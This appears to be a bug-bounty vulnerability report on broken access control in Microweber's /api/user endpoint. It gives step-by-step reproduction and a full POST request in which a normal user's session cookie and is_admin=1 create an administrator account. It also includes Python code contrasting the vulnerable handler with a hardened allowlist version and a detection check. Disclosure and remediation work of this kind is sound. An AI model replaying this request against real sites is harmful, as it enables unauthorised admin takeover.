Broken Access Control on "http://localhost/api/user" endpoint in microweber/microweber
Reported on
Mar 16th 2023
Description
Able to create an Admin account from normal User account.
Steps
1. Navigate to https://localhost/.
2. Click on Login, then Register, fill in the form and click Register.
3. Log in with the newly created user account while intercepting the traffic in Burp.
4. Turn on Burp intercept, refresh the page and copy the laravel_session cookie.
5. Send the POST request below with the copied user laravel_session.
POST /api/user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/admin/view:modules/load_module:users/edit-user:0
Cookie: laravel_session=XDkQKNuW---Qs22;

thumbnail=&id=0&username=testaccount&password=testaccount&verify_password=testaccount&first_name=testaccount&last_name=testaccount&email=testaccount%40test.com&phone=&is_admin=1&is_active=1&basic_mode=0&api_key=
6. The response says 201 Created: a new admin account has been created.
7. You can now log in with the credentials you sent in the POST request as an admin user at http://localhost/admin/login.
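The root cause, as it reads from the request above, is that the user-creation endpoint writes whatever fields are posted, including is_admin, into the new record. The following is an added illustration (not Microweber's code) of that mass-assignment pattern beside a hardened handler that allowlists writable fields and refuses privileged ones from non-admin sessions, plus a check that flags such requests in logs; the field names come from the request above, while the SAFE_FIELDS/PRIVILEGED_FIELDS split and the caller_is_admin flag are assumptions.

```python
from urllib.parse import parse_qs

# Fields any authenticated caller may set on a user record (names from the report's request).
SAFE_FIELDS = {"username", "password", "verify_password", "first_name",
               "last_name", "email", "phone", "thumbnail"}
# Fields that change privilege or account state; only an admin session may set them (assumed split).
PRIVILEGED_FIELDS = {"is_admin", "is_active", "basic_mode", "api_key"}

class Forbidden(Exception):
    """Raised when a non-admin session tries to set a privileged field."""

def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def vulnerable_create_user(fields: dict, caller_is_admin: bool) -> dict:
    """Mass-assignment pattern: every posted field lands in the record, so a
    normal user who posts is_admin=1 is stored as an administrator."""
    return dict(fields)

def hardened_create_user(fields: dict, caller_is_admin: bool) -> dict:
    """Allowlist writable fields and require an admin session for privileged ones."""
    record = {k: v for k, v in fields.items() if k in SAFE_FIELDS}  # unknown keys (e.g. id) dropped
    requested = {k: v for k, v in fields.items() if k in PRIVILEGED_FIELDS}
    if requested and not caller_is_admin:
        raise Forbidden(f"non-admin session tried to set {sorted(requested)}")  # fail closed
    record.update(requested)
    record.setdefault("is_admin", "0")  # the server decides the default, never the client
    return record

def create_user_outcome(body: str, caller_is_admin: bool) -> str:
    """Run the hardened handler on a raw body: 'forbidden', 'admin' or 'user'."""
    try:
        record = hardened_create_user(parse_form(body), caller_is_admin)
    except Forbidden:
        return "forbidden"
    return "admin" if record["is_admin"] == "1" else "user"

def is_escalation_attempt(body: str, caller_is_admin: bool) -> bool:
    """Detection check for request logs: a non-admin session posting any privileged field."""
    return not caller_is_admin and any(k in PRIVILEGED_FIELDS for k in parse_form(body))

if __name__ == "__main__":
    # Constructed sample: the body from the report, sent from a normal-user session.
    body = ("thumbnail=&id=0&username=testaccount&password=testaccount&verify_password=testaccount"
            "&first_name=testaccount&last_name=testaccount&email=testaccount%40test.com&phone="
            "&is_admin=1&is_active=1&basic_mode=0&api_key=")
    print("vulnerable:", vulnerable_create_user(parse_form(body), False)["is_admin"])  # 1
    print("hardened:", create_user_outcome(body, False))  # forbidden
    print("flagged:", is_escalation_attempt(body, False))  # True
```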
Video-PoC
https://drive.google.com/file/d/1xBuvOjIGU6W5Q5xx-HqQ0TwzYDEcUubD/view?usp=sharing
Impact
A normal user account can create an admin account on the website, gaining access to all sensitive data and all privileges of an admin.